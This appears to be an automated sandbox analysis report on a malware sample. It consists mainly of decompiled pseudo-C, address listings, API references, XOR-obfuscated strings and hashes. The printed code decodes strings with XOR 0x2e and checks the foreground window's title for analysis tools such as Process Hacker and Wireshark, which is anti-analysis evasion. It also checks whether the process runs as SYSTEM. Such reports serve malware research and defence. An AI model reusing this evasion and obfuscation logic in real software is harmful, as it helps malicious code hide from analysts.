							 *0x450d65 =  *0x450d65 ^ 0x0000002e;
							 *0x450d66 =  *0x450d66 ^ 0x0000002e;
							 *0x450d67 =  *0x450d67 ^ 0x0000002e;
							 *0x450d68 =  *0x450d68 ^ 0x0000002e;
							 *0x450d69 = _t115 ^ 0x0000002e;
						}
						_t241 = _t240 - 0x18;
						_t204 = 0x450d60;
						_t222 = _t241;
						_t25 =  &(_t204[1]); // 0x450d61
						_t227 = _t25;
						 *_t222 = 0;
						_t222[4] = 0;
						_t222[5] = 0xf;
						do {
							_t116 =  *_t204;
							_t204 =  &(_t204[1]);
						} while (_t116 != 0);
						E004026C0(_t190, _t222, 0x450d60, _t204 - _t227); // executed
						_t118 = E00405350(_t190); // executed
						_t242 =  &(_t241[6]);
						if(_t118 != 0) {
							goto L56;
						} else {
							_t119 = GetForegroundWindow(); // executed
							if(_t119 == 0) {
								L55:
								_t107 = 0;
								goto L57;
							} else {
								GetWindowTextA(_t119,  &_v276, 0x100);
								_t121 =  *0x450f9c; // 0x80000013
								_v304 = 0x4d415c7e;
								_v300 = 0xe5d5d4b;
								_v296 = 0x454d4f66;
								_v292 = 0x5c4b;
								if(_t121 >  *((intOrPtr*)(_t229 + 4))) {
									E0040EEC8(_t121, 0x450f9c);
									_t242 =  &(_t242[1]);
									_t271 =  *0x450f9c - 0xffffffff;
									if( *0x450f9c == 0xffffffff) {
										_t34 =  &_v296; // 0x454d4f66
										asm("movq xmm0, [ebp-0x12c]");
										 *0x450f4c =  *_t34;
										_t35 =  &_v292; // 0x5c4b
										asm("movq [0x450f44], xmm0");
										 *0x450f50 =  *_t35;
										 *0x450f52 = 0x2e;
										E0040F1DA( &_v276, _t271, E0042CEE0);
										E0040EE7E(0x450f9c);
										_t242 =  &(_t242[2]);
									}
								}
								if( *0x450f52 != 0) {
									_t169 = 0;
									do {
										 *(_t169 + 0x450f44) =  *(_t169 + 0x450f44) ^ 0x0000002e;
										_t169 = _t169 + 1;
									} while (_t169 < 0xf);
								}
								_t208 = 0x450f44;
								_v356 = 0;
								_v340 = 0;
								_v336 = 0xf;
								_v356 = 0;
								_t42 = _t208 + 1; // 0x450f45
								_t222 = _t42;
								do {
									_t122 =  *_t208;
									_t208 = _t208 + 1;
								} while (_t122 != 0);
								E004026C0(0x2e,  &_v356, 0x450f44, _t208 - _t222);
								_v8 = 0;
								_t193 = 1;
								_v284 = 1;
								_t125 =  >=  ? _v356 :  &_v356;
								_t127 = E00410160( &_v276,  >=  ? _v356 :  &_v356);
								_t243 =  &(_t242[2]);
								if(_t127 != 0) {
									L42:
									_v305 = 1;
								} else {
									_t156 =  *0x450f40; // 0x80000014
									_v300 = 0x4b5c4779;
									_v296 = 0x5c4f465d;
									_v292 = 0x2e45;
									if(_t156 >  *((intOrPtr*)(_t229 + 4))) {
										E0040EEC8(_t156, 0x450f40);
										_t243 = _t243 + 4;
										_t279 =  *0x450f40 - 0xffffffff;
										if( *0x450f40 == 0xffffffff) {
											asm("movq xmm0, [ebp-0x128]");
											_t54 =  &_v292; // 0x2e45
											asm("movq [0x450fc8], xmm0");
											 *0x450fd0 =  *_t54;
											E0040F1DA( &_v356, _t279, E0042CEC0);
											E0040EE7E(0x450f40);
											_t243 = _t243 + 8;
										}
									}
									_t157 =  *0x450fd1; // 0x0
									if(_t157 != 0) {
										 *0x450fc8 =  *0x450fc8 ^ 0x0000002e;
										 *0x450fc9 =  *0x450fc9 ^ 0x0000002e;
										 *0x450fca =  *0x450fca ^ 0x0000002e;
										 *0x450fcb =  *0x450fcb ^ 0x0000002e;
										 *0x450fcc =  *0x450fcc ^ 0x0000002e;
										 *0x450fcd =  *0x450fcd ^ 0x0000002e;
										 *0x450fce =  *0x450fce ^ 0x0000002e;
										 *0x450fcf =  *0x450fcf ^ 0x0000002e;
										 *0x450fd0 =  *0x450fd0 ^ 0x0000002e;
										 *0x450fd1 = _t157 ^ 0x0000002e;
									}
									_t217 = 0x450fc8;
									_v332 = 0;
									_v316 = 0;
									_v312 = 0xf;
									_t58 =  &(_t217[1]); // 0x450fc9
									_t222 = _t58;
									do {
										_t158 =  *_t217;
										_t217 =  &(_t217[1]);
									} while (_t158 != 0);
									E004026C0(_t193,  &_v332, 0x450fc8, _t217 - _t222);
									_t193 = 3;
									_t161 =  >=  ? _v332 :  &_v332;
									_t163 = E00410160( &_v276,  >=  ? _v332 :  &_v332);
									_t243 = _t243 + 8;
									_v305 = 0;
									if(_t163 != 0) {
										goto L42;
									}
								}
								if((_t193 & 0x00000002) == 0) {
									L49:
									if((_t193 & 0x00000001) == 0) {
										L54:
										if(_v305 != 0) {
											goto L56;
										} else {
											goto L55;
										}
										L57:
										 *[fs:0x0] = _v16;
										_pop(_t225);
										_pop(_t230);
										_pop(_t191);
										return E0040EB3F(_t107, _t191, _v20 ^ _t233, _t222, _t225, _t230);
									} else {
										_t222 = _v336;
										if(_t222 < 0x10) {
											goto L54;
										} else {
											_t211 = _v356;
											_t222 =  &(_t222[0]);
											_t128 = _t211;
											if(_t222 < 0x1000) {
												L53:
												_push(_t222);
												E0040ED7F(_t211);
												goto L54;
											} else {
												_t211 =  *(_t211 - 4);
												_t222 =  &(_t222[8]);
												if(_t128 - _t211 + 0xfffffffc > 0x1f) {
													goto L58;
												} else {
													goto L53;
												}
											}
										}
									}
								} else {
									_t222 = _v312;
									_t193 = _t193 & 0xfffffffd;
									if(_t222 < 0x10) {
										L48:
										_v316 = 0;
										_v312 = 0xf;
										_v332 = 0;
										goto L49;
									} else {
										_t216 = _v332;
										_t222 =  &(_t222[0]);
										_t152 = _t216;
										if(_t222 < 0x1000) {
											L47:
											_push(_t222);
											E0040ED7F(_t216);
											_t243 = _t243 + 8;
											goto L48;
										} else {
											_t216 =  *(_t216 - 4);
											_t222 =  &(_t222[8]);
											if(_t152 - _t216 + 0xfffffffc > 0x1f) {
												L58:
												E004134A7(_t193, _t222, __eflags);
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t233);
												_t234 = _t243;
												_t133 =  *0x43d054; // 0x8e1b5714
												_v380 = _t133 ^ _t234;
												_v464 = 0;
												_v460 = 0x500;
												_t137 = OpenProcessToken(GetCurrentProcess(), 8,  &_v472);
												__eflags = _t137;
												if(_t137 == 0) {
													L62:
													__eflags = _v12 ^ _t234;
													return E0040EB3F(0, _t193, _v12 ^ _t234, _t222, _t227, _t229);
												} else {
													_t142 = GetTokenInformation(_v104, 1,  &_v88, 0x4c,  &_v100); // executed
													_push(_v104);
													__eflags = _t142;
													if(_t142 != 0) {
														CloseHandle();
														_t146 = AllocateAndInitializeSid( &_v96, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v108);
														__eflags = _t146;
														if(_t146 == 0) {
															goto L62;
														} else {
															_t147 = EqualSid(_v88, _v108);
															FreeSid(_v108);
															__eflags = _v12 ^ _t234;
															_t232 = _t229;
															return E0040EB3F(_t147, _t193, _v12 ^ _t234, _t222, _t227, _t232);
														}
													} else {
														CloseHandle();
														goto L62;
													}
												}
											} else {
												goto L47;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x00405f40
0x00405f43
0x00405f45
0x00405f50
0x00405f51
0x00405f57
0x00405f5c
0x00405f5e
0x00405f61
0x00405f63
0x00405f64
0x00405f68
0x00405f6e
0x00405f7e
0x00405f88
0x00405f92
0x00405f94
0x00405f9f
0x00405fa6
0x00405fab
0x00405fae
0x00405fb5
0x00405fb7
0x00405fbd
0x00405fc8
0x00405fcd
0x00405fd3
0x00405fe0
0x00405fe5
0x00405fe5
0x00405fb5
0x00405fe8
0x00405fef
0x00405ff1
0x00405ff8
0x00405fff
0x00406006
0x0040600d
0x00406014
0x0040601b
0x00406024
0x00406024
0x00406029
0x0040602c
0x00406031
0x00406033
0x00406033
0x00406036
0x0040603c
0x00406043
0x0040604a
0x00406050
0x00406050
0x00406052
0x00406053
0x00406061
0x00406066
0x0040606b
0x00406070
0x004065ae
0x004065ae
0x00000000
0x00406076
0x00406076
0x0040607b
0x00406085
0x00406095
0x0040609c
0x004060a1
0x004060a4
0x004060ab
0x004060ad
0x004060b3
0x004060be
0x004060c3
0x004060c9
0x004060d6
0x004060db
0x004060db
0x004060ab
0x004060de
0x004060e5
0x004060e7
0x004060ee
0x004060f5
0x004060fc
0x00406103
0x0040610a
0x00406111
0x0040611a
0x0040611a
0x0040611f
0x00406122
0x00406127
0x00406129
0x00406129
0x0040612c
0x00406132
0x00406139
0x00406140
0x00406140
0x00406142
0x00406143
0x0040614f
0x00406151
0x00406156
0x0040615b
0x00406160
0x00000000
0x00406166
0x00406166
0x0040616b
0x00406175
0x0040617f
0x0040618e
0x00406195
0x0040619a
0x0040619d
0x004061a4
0x004061a6
0x004061ba
0x004061c2
0x004061c8
0x004061d5
0x004061da
0x004061da
0x004061a4
0x004061dd
0x004061e4
0x004061e6
0x004061ed
0x004061f4
0x004061fb
0x00406202
0x00406209
0x00406210
0x00406217
0x0040621e
0x00406227
0x00406227
0x0040622c
0x0040622f
0x00406234
0x00406236
0x00406236
0x00406239
0x0040623f
0x00406246
0x00406250
0x00406250
0x00406252
0x00406253
0x00406261
0x00406266
0x0040626b
0x00406270
0x00000000
0x00406276
0x00406276
0x0040627e
0x004065aa
0x004065aa
0x00000000
0x00406284
0x00406291
0x00406297
0x0040629e
0x004062a8
0x004062b2
0x004062bc
0x004062cb
0x004062d2
0x004062d7
0x004062da
0x004062e1
0x004062e3
0x004062e9
0x004062f1
0x004062f6
0x00406302
0x0040630a
0x00406310
0x00406316
0x00406323
0x00406328
0x00406328
0x004062e1
0x00406332
0x00406334
0x00406336
0x00406336
0x0040633c
0x0040633d
0x00406336
0x00406342
0x00406347
0x00406351
0x0040635b
0x00406365
0x0040636c
0x0040636c
0x00406370
0x00406370
0x00406372
0x00406373
0x00406385
0x0040638a
0x0040639e
0x004063a3
0x004063a9
0x004063b8
0x004063bd
0x004063c2
0x00406502
0x00406502
0x004063c8
0x004063c8
0x004063cd
0x004063d7
0x004063e1
0x004063f0
0x004063f7
0x004063fc
0x004063ff
0x00406406
0x00406408
0x00406410
0x0040641c
0x00406424
0x0040642a
0x00406437
0x0040643c
0x0040643c
0x00406406
0x0040643f
0x00406446
0x00406448
0x0040644f
0x00406456
0x0040645d
0x00406464
0x0040646b
0x00406472
0x00406479
0x00406480
0x00406489
0x00406489
0x0040648e
0x00406493
0x0040649d
0x004064a7
0x004064b1
0x004064b1
0x004064b4
0x004064b4
0x004064b6
0x004064b7
0x004064c9
0x004064db
0x004064e0
0x004064ef
0x004064f4
0x004064f7
0x00406500
0x00000000
0x00000000
0x00406500
0x0040650c
0x00406566
0x00406569
0x004065a1
0x004065a8
0x00000000
0x00000000
0x00000000
0x00000000
0x004065b0
0x004065b3
0x004065bb
0x004065bc
0x004065bd
0x004065cb
0x0040656b
0x0040656b
0x00406574
0x00000000
0x00406576
0x00406576
0x0040657c
0x0040657d
0x00406585
0x00406597
0x00406597
0x00406599
0x00000000
0x00406587
0x00406587
0x0040658a
0x00406595
0x00000000
0x00000000
0x00000000
0x00000000
0x00406595
0x00406585
0x00406574
0x0040650e
0x0040650e
0x00406514
0x0040651a
0x0040654b
0x0040654b
0x00406555
0x0040655f
0x00000000
0x0040651c
0x0040651c
0x00406522
0x00406523
0x0040652b
0x00406541
0x00406541
0x00406543
0x00406548
0x00000000
0x0040652d
0x0040652d
0x00406530
0x0040653b
0x004065cc
0x004065cc
0x004065d1
0x004065d2
0x004065d3
0x004065d4
0x004065d5
0x004065d6
0x004065d7
0x004065d8
0x004065d9
0x004065da
0x004065db
0x004065dc
0x004065dd
0x004065de
0x004065df
0x004065e0
0x004065e1
0x004065e6
0x004065ed
0x004065f3
0x004065fd
0x0040660a
0x00406610
0x00406612
0x00406636
0x0040663b
0x00406645
0x00406614
0x00406623
0x00406629
0x0040662c
0x0040662e
0x00406646
0x00406666
0x0040666c
0x0040666e
0x00000000
0x00406670
0x00406677
0x00406682
0x0040668d
0x0040668f
0x00406698
0x00406698
0x00406630
0x00406630
0x00000000
0x00406630
0x0040662e
0x00000000
0x00000000
0x00000000
0x0040653b
0x0040652b
0x0040651a
0x0040650c
0x0040627e
0x00406270
0x00406160

APIs

__Init_thread_footer.LIBCMT ref: 00405FE0

Part of subcall function 0040EE7E: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F40,?,?,00450F44,00450F45), ref: 0040EE88
Part of subcall function 0040EE7E: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F40,?,?,00450F44,00450F45), ref: 0040EEBB
Part of subcall function 0040EE7E: RtlWakeAllConditionVariable.NTDLL ref: 0040EF32

__Init_thread_footer.LIBCMT ref: 004061D5
GetForegroundWindow.USER32 ref: 00406276
GetWindowTextA.USER32 ref: 00406291
__Init_thread_footer.LIBCMT ref: 00406323
__Init_thread_footer.LIBCMT ref: 004060D6

Part of subcall function 0040EEC8: EnterCriticalSection.KERNEL32(004504FC,00450D61,?,?,004063FC,00450F40,00450F44,00450F45), ref: 0040EED3
Part of subcall function 0040EEC8: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F40,00450F44,00450F45), ref: 0040EF10

__Init_thread_footer.LIBCMT ref: 00406437

Strings

fOMEK\YG\K]FO\E., xrefs: 004062E3
~\AM, xrefs: 0040629E
E., xrefs: 0040617F
yG\K, xrefs: 004063CD

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: Init_thread_footer$CriticalSection$EnterLeaveWindow$ConditionForegroundTextVariableWake
String ID: E.$fOMEK\YG\K]FO\E.$yG\K$~\AM
API String ID: 1590647277-3754284071
Opcode ID: 37792c147cc87062c45f1b091b1bedf532a8e0981eb71191bb49d22d98c99bc2
Instruction ID: 3d9235338341bdb2505a9341eec423b45f29305e3118e9ff7ef5adf2af52ebc3
Opcode Fuzzy Hash: 37792c147cc87062c45f1b091b1bedf532a8e0981eb71191bb49d22d98c99bc2
Instruction Fuzzy Hash: 26F109799003848ADB34DB34EC457AA7B70AB05319F1401FED8452A2D3D7F99A99CB8D

Uniqueness

Uniqueness Score: -1.00%

Function 00406AA0 Relevance: 18.8, APIs: 6, Strings: 4, Instructions: 1318
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00406AA0(void* __ebx, long __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				signed char _v16;
				char _v20;
				signed int _v24;
				short _v28;
				signed int _v32;
				char _v56;
				char _v80;
				char _v104;
				char _v300;
				signed char _v304;
				signed char _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				signed char _v324;
				long _v328;
				signed char _v332;
				char _v348;
				long _v352;
				signed char _v356;
				char _v372;
				long _v376;
				signed char _v380;
				signed char _v396;
				char _v400;
				char _v401;
				long _v408;
				signed char _v412;
				signed char _v428;
				long _v432;
				signed char _v436;
				signed char _v452;
				long _v456;
				signed char _v460;
				char _v476;
				signed char _v496;
				char _v504;
				signed int _v508;
				char _v760;
				char _v1088;
				signed char _v1092;
				intOrPtr _v1096;
				signed int _v1100;
				intOrPtr _v1104;
				char _v1128;
				char _v1152;
				char _v1176;
				char _v1200;
				char _v1224;
				char _v1248;
				char _v1272;
				signed int _v1724;
				short _v1728;
				intOrPtr _v1732;
				intOrPtr _v1736;
				void* __ebp;
				signed int _t794;
				signed int _t795;
				void* _t797;
				signed int _t799;
				intOrPtr _t803;
				signed char _t804;
				signed int _t805;
				char* _t809;
				void* _t811;
				signed int _t817;
				intOrPtr _t818;
				signed int _t819;
				char* _t823;
				void* _t825;
				signed int _t831;
				intOrPtr _t832;
				signed char _t833;
				signed int _t834;
				char* _t838;
				void* _t840;
				signed int _t846;
				void* _t853;
				char* _t854;
				intOrPtr _t861;
				signed int _t868;
				signed int _t869;
				signed int _t871;
				void* _t875;
				void* _t878;
				void* _t880;
				void* _t881;
				void* _t882;
				void* _t883;
				void* _t884;
				void* _t893;
				signed int _t894;
				signed int _t897;
				signed int _t903;
				void* _t909;
				void* _t910;
				signed int _t912;
				void* _t917;
				void* _t921;
				void* _t922;
				signed int _t924;
				signed int _t928;
				intOrPtr _t931;
				signed int _t939;
				void* _t940;
				signed char _t943;
				char* _t947;
				intOrPtr _t948;
				signed char _t952;
				signed int _t955;
				signed int _t957;
				char _t961;
				signed char _t962;
				signed char _t966;
				intOrPtr _t970;
				signed int _t977;
				void* _t982;
				char* _t983;
				signed char _t987;
				intOrPtr _t991;
				intOrPtr _t995;
				signed char _t999;
				intOrPtr _t1003;
				char _t1008;
				signed char _t1009;
				signed char _t1013;
				intOrPtr _t1017;
				signed int _t1024;
				void* _t1031;
				char* _t1032;
				intOrPtr _t1036;
				intOrPtr _t1040;
				signed char _t1044;
				intOrPtr _t1048;
				char _t1053;
				signed char _t1054;
				signed char _t1058;
				intOrPtr _t1062;
				char* _t1074;
				signed int _t1076;
				signed int _t1079;
				void* _t1082;
				void* _t1083;
				void* _t1089;
				intOrPtr _t1091;
				signed char _t1092;
				signed int _t1093;
				char* _t1097;
				void* _t1099;
				signed int _t1105;
				intOrPtr _t1106;
				signed int _t1107;
				char* _t1111;
				void* _t1113;
				signed int _t1119;
				intOrPtr _t1120;
				signed char _t1121;
				signed int _t1122;
				char* _t1126;
				void* _t1128;
				signed int _t1134;
				intOrPtr _t1135;
				intOrPtr _t1139;
				void* _t1143;
				char* _t1144;
				intOrPtr _t1148;
				intOrPtr _t1152;
				signed char _t1156;
				intOrPtr _t1160;
				char _t1165;
				signed char _t1166;
				signed char _t1170;
				intOrPtr _t1174;
				signed int _t1181;
				void* _t1186;
				char* _t1187;
				intOrPtr _t1191;
				intOrPtr _t1194;
				signed char _t1198;
				intOrPtr _t1202;
				char _t1207;
				signed char _t1208;
				signed char _t1212;
				intOrPtr _t1216;
				signed int _t1223;
				void* _t1230;
				char* _t1231;
				intOrPtr _t1235;
				intOrPtr _t1238;
				signed char _t1242;
				signed char _t1246;
				char _t1251;
				signed char _t1252;
				signed char _t1256;
				signed char _t1260;
				void* _t1272;
				char* _t1273;
				intOrPtr _t1277;
				intOrPtr _t1280;
				signed char _t1284;
				signed char _t1288;
				char _t1293;
				intOrPtr _t1294;
				signed char _t1299;
				intOrPtr _t1303;
				void* _t1306;
				intOrPtr* _t1315;
				signed char _t1318;
				void* _t1323;
				intOrPtr* _t1324;
				signed char _t1327;
				void* _t1332;
				signed char* _t1333;
				signed char _t1336;
				void* _t1341;
				char* _t1353;
				long _t1404;
				signed int _t1422;
				signed char _t1424;
				signed char _t1425;
				char _t1426;
				char* _t1431;
				signed char _t1432;
				char _t1433;
				char _t1434;
				signed char _t1435;
				char _t1436;
				signed char _t1437;
				signed char _t1438;
				char _t1439;
				char* _t1443;
				char _t1444;
				char _t1445;
				signed char _t1446;
				char _t1447;
				signed char _t1448;
				signed char _t1449;
				char _t1450;
				intOrPtr* _t1451;
				signed int _t1452;
				char* _t1456;
				void* _t1462;
				intOrPtr* _t1463;
				signed char _t1466;
				void* _t1471;
				intOrPtr* _t1472;
				signed char _t1475;
				void* _t1480;
				signed char* _t1481;
				signed char _t1484;
				void* _t1489;
				char _t1490;
				char _t1491;
				char* _t1495;
				char _t1496;
				char _t1497;
				signed char _t1498;
				char _t1499;
				signed char _t1500;
				signed char _t1501;
				char _t1502;
				char* _t1507;
				char _t1508;
				signed char _t1509;
				intOrPtr _t1510;
				signed char _t1511;
				signed char _t1512;
				intOrPtr _t1513;
				char* _t1517;
				char _t1518;
				signed char _t1519;
				signed char _t1520;
				signed char _t1521;
				signed char _t1522;
				signed char _t1523;
				char* _t1527;
				intOrPtr _t1528;
				signed char _t1529;
				signed char _t1530;
				intOrPtr _t1531;
				signed char _t1532;
				intOrPtr* _t1533;
				void* _t1537;
				long _t1538;
				long _t1540;
				long _t1541;
				long _t1542;
				void* _t1543;
				long _t1544;
				long _t1546;
				long _t1547;
				long _t1548;
				signed char* _t1549;
				long _t1550;
				long _t1552;
				long _t1553;
				signed char _t1557;
				void* _t1576;
				void* _t1577;
				signed char _t1580;
				long _t1581;
				long _t1582;
				long _t1583;
				long _t1584;
				void* _t1585;
				void* _t1586;
				void* _t1587;
				void* _t1588;
				void* _t1589;
				void* _t1590;
				signed char _t1593;
				long _t1594;
				long _t1595;
				long _t1596;
				long _t1597;
				void* _t1598;
				void* _t1599;
				void* _t1600;
				void* _t1601;
				void* _t1602;
				void* _t1603;
				intOrPtr* _t1604;
				long _t1609;
				long _t1610;
				void* _t1611;
				signed char _t1612;
				long _t1614;
				long _t1615;
				signed char _t1616;
				void* _t1617;
				long _t1618;
				long _t1620;
				long _t1621;
				long _t1622;
				signed char* _t1623;
				long _t1624;
				long _t1626;
				long _t1627;
				long _t1628;
				long _t1629;
				void* _t1630;
				signed char _t1633;
				long _t1634;
				long _t1635;
				long _t1636;
				long _t1637;
				void* _t1638;
				void* _t1639;
				void* _t1640;
				void* _t1641;
				void* _t1642;
				void* _t1643;
				signed char _t1646;
				long _t1647;
				long _t1648;
				long _t1649;
				long _t1650;
				void* _t1651;
				void* _t1652;
				void* _t1653;
				void* _t1654;
				void* _t1655;
				signed char _t1658;
				long _t1659;
				long _t1660;
				long _t1661;
				long _t1662;
				void* _t1663;
				void* _t1664;
				void* _t1665;
				void* _t1666;
				void* _t1667;
				signed char _t1670;
				long _t1671;
				long _t1672;
				long _t1673;
				long _t1674;
				void* _t1675;
				void* _t1676;
				void* _t1677;
				void* _t1678;
				void* _t1679;
				long _t1681;
				void* _t1682;
				long _t1686;
				void* _t1687;
				signed int _t1690;
				signed int _t1696;
				signed int _t1698;
				signed int _t1699;
				void* _t1701;
				signed int _t1704;
				void* _t1705;
				void* _t1706;
				signed char _t1707;
				void* _t1708;
				void* _t1709;
				void* _t1710;
				signed char _t1711;
				void* _t1712;
				void* _t1713;
				signed int _t1714;
				signed char _t1715;
				void* _t1716;
				void* _t1717;
				void* _t1722;
				void* _t1728;
				void* _t1729;
				signed int _t1730;
				void* _t1736;
				char _t1745;
				void* _t1746;
				void* _t1747;
				signed char _t1748;
				void* _t1749;
				void* _t1750;
				signed char _t1751;
				void* _t1752;
				void* _t1753;
				signed char _t1754;
				void* _t1755;

				_push(__ebx);
				_t1306 = _t1701;
				_t1704 = (_t1701 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t1306 + 4));
				_t1696 = _t1704;
				_push(0xffffffff);
				_push(0x42c8c2);
				_push( *[fs:0x0]);
				_push(_t1306);
				_t1705 = _t1704 - 0x1c0;
				_t794 =  *0x43d054; // 0x8e1b5714
				_t795 = _t794 ^ _t1696;
				_v32 = _t795;
				_push(__esi);
				_push(__edi);
				_push(_t795);
				 *[fs:0x0] =  &_v24;
				_t1686 = __ecx;
				_v400 = __ecx;
				_v400 = __ecx;
				_v396 = 0;
				_v380 = 0;
				_v376 = 0xf;
				_v396 = 0;
				_v16 = 0;
				_t797 = E004065E0(__ecx); // executed
				if(_t797 != 0) {
					E00406760(_t1306,  &_v348, __edi);
					_v16 = 0x16;
					_t799 = E00417D76( &_v348, __eflags);
					asm("cdq");
					E004055C0( &_v372, _t799 % 0xa + 5);
					_v16 = 0x17;
					_v401 = 0x2e;
					_t1681 =  *( *[fs:0x2c]);
					_t803 =  *0x450f1c; // 0x0
					__eflags = _t803 -  *((intOrPtr*)(_t1681 + 4));
					if(_t803 >  *((intOrPtr*)(_t1681 + 4))) {
						E0040EEC8(_t803, 0x450f1c);
						_t1705 = _t1705 + 4;
						__eflags =  *0x450f1c - 0xffffffff;
						if(__eflags == 0) {
							asm("movaps xmm0, [0x439d70]");
							asm("movups [0x450e3c], xmm0");
							 *0x450e4c = _v401;
							E0040F1DA( &_v372, __eflags, 0x42cf90);
							E0040EE7E(0x450f1c);
							_t1705 = _t1705 + 8;
						}
					}
					_t804 =  *0x450e4c; // 0x0
					__eflags = _t804;
					if(_t804 != 0) {
						asm("movups xmm0, [0x450e3c]");
						asm("movaps xmm1, [0x439d20]");
						asm("pxor xmm1, xmm0");
						 *0x450e4c = _t804 ^ 0x0000002e;
						asm("movups [0x450e3c], xmm1");
					}
					_t1315 = 0x450e3c;
					_v452 = 0;
					_v436 = 0;
					_v432 = 0xf;
					_v452 = 0;
					_t408 = _t1315 + 1; // 0x450e3d
					_t1537 = _t408;
					do {
						_t805 =  *_t1315;
						_t1315 = _t1315 + 1;
						__eflags = _t805;
					} while (_t805 != 0);
					E004026C0(_t1306,  &_v452, 0x450e3c, _t1315 - _t1537);
					_v16 = 0x18;
					_t1538 = _v432;
					_t1318 = _v436;
					__eflags = _t1538 - _t1318 - 1;
					if(_t1538 - _t1318 < 1) {
						_v400 = 0;
						_t809 = E00402990(_t1306,  &_v452, _t1681, _t1686, 1, _v400, "\\", 1);
					} else {
						_t413 =  &(1[_t1318]); // 0x1
						__eflags = _t1538 - 0x10;
						_v436 = _t413;
						_t1068 =  >=  ? _v452 :  &_v452;
						 *((short*)(( >=  ? _v452 :  &_v452) + _t1318)) = 0x5c;
						_t809 =  &_v452;
					}
					_v428 = 0;
					_v412 = 0;
					_v408 = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ebp-0x1a0], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ebp-0x190], xmm0");
					 *(_t809 + 0x10) = 0;
					 *(_t809 + 0x14) = 0xf;
					 *_t809 = 0;
					_v16 = 0x19;
					_t811 = E0040C910( &_v476,  &_v428,  &_v348);
					_t1706 = _t1705 + 4;
					E004024A0(_t1306,  &_v396, _t811);
					_t1540 = _v456;
					__eflags = _t1540 - 0x10;
					if(_t1540 < 0x10) {
						L198:
						_v16 = 0x18;
						_t1541 = _v408;
						_v460 = 0;
						_v456 = 0xf;
						_v476 = 0;
						__eflags = _t1541 - 0x10;
						if(_t1541 < 0x10) {
							L202:
							_v16 = 0x17;
							_t1542 = _v432;
							_v412 = 0;
							_v408 = 0xf;
							_v428 = 0;
							__eflags = _t1542 - 0x10;
							if(_t1542 < 0x10) {
								L206:
								_t1707 = _t1706 - 0x18;
								_v304 = _t1707;
								E0040BB10(_t1306, _t1707, _t1542, _t1681,  &_v372);
								_t1708 = _t1707 - 0x18;
								_v16 = 0x1a;
								_t1323 = _t1708;
								E0040BB10(_t1306, _t1323, _t1542, _t1681,  &_v396);
								_v16 = 0x17;
								_t817 = E00406800(_t1306, _t1323, _t1681, _t1686);
								_t1709 = _t1708 + 0x30;
								__eflags = _t817;
								if(_t817 == 0) {
									_t818 =  *0x450f68; // 0x0
									_v316 = 0x7e72146d;
									_v312 = 0x5c49415c;
									_v308 = 0x4f6a434f;
									_v304 = 0x4f5a;
									_v401 = 0x2e;
									__eflags = _t818 -  *((intOrPtr*)(_t1681 + 4));
									if(_t818 >  *((intOrPtr*)(_t1681 + 4))) {
										E0040EEC8(_t818, 0x450f68);
										_t1709 = _t1709 + 4;
										__eflags =  *0x450f68 - 0xffffffff;
										if(__eflags == 0) {
											asm("movq xmm0, [ebp-0x130]");
											 *0x450d50 = _v308;
											 *0x450d54 = _v304;
											asm("movq [0x450d48], xmm0");
											 *0x450d56 = _v401;
											E0040F1DA(_t1323, __eflags, 0x42cf60);
											E0040EE7E(0x450f68);
											_t1709 = _t1709 + 8;
										}
									}
									__eflags =  *0x450d56;
									if( *0x450d56 != 0) {
										_t1024 = 0;
										__eflags = 0;
										do {
											 *(_t1024 + 0x450d48) =  *(_t1024 + 0x450d48) ^ 0x0000002e;
											_t1024 = _t1024 + 1;
											__eflags = _t1024 - 0xf;
										} while (_t1024 < 0xf);
									}
									_t1324 = 0x450d48;
									_v452 = 0;
									_v436 = 0;
									_v432 = 0xf;
									_v452 = 0;
									_t512 = _t1324 + 1; // 0x450d49
									_t1543 = _t512;
									asm("o16 nop [eax+eax]");
									do {
										_t819 =  *_t1324;
										_t1324 = _t1324 + 1;
										__eflags = _t819;
									} while (_t819 != 0);
									E004026C0(_t1306,  &_v452, 0x450d48, _t1324 - _t1543);
									_v16 = 0x1d;
									_t1544 = _v432;
									_t1327 = _v436;
									__eflags = _t1544 - _t1327 - 1;
									if(_t1544 - _t1327 < 1) {
										_v400 = 0;
										_t823 = E00402990(_t1306,  &_v452, _t1681, _t1686, 1, _v400, "\\", 1);
									} else {
										_t517 =  &(1[_t1327]); // 0x1
										__eflags = _t1544 - 0x10;
										_v436 = _t517;
										_t1023 =  >=  ? _v452 :  &_v452;
										 *((short*)(( >=  ? _v452 :  &_v452) + _t1327)) = 0x5c;
										_t823 =  &_v452;
									}
									_v428 = 0;
									_v412 = 0;
									_v408 = 0;
									asm("movups xmm0, [eax]");
									asm("movups [ebp-0x1a0], xmm0");
									asm("movq xmm0, [eax+0x10]");
									asm("movq [ebp-0x190], xmm0");
									 *(_t823 + 0x10) = 0;
									 *(_t823 + 0x14) = 0xf;
									 *_t823 = 0;
									_v16 = 0x1e;
									_t825 = E0040C910( &_v476,  &_v428,  &_v348);
									_t1710 = _t1709 + 4;
									E004024A0(_t1306,  &_v396, _t825);
									_t1546 = _v456;
									__eflags = _t1546 - 0x10;
									if(_t1546 < 0x10) {
										L244:
										_v16 = 0x1d;
										_t1547 = _v408;
										_v460 = 0;
										_v456 = 0xf;
										_v476 = 0;
										__eflags = _t1547 - 0x10;
										if(_t1547 < 0x10) {
											L248:
											_v16 = 0x17;
											_t1548 = _v432;
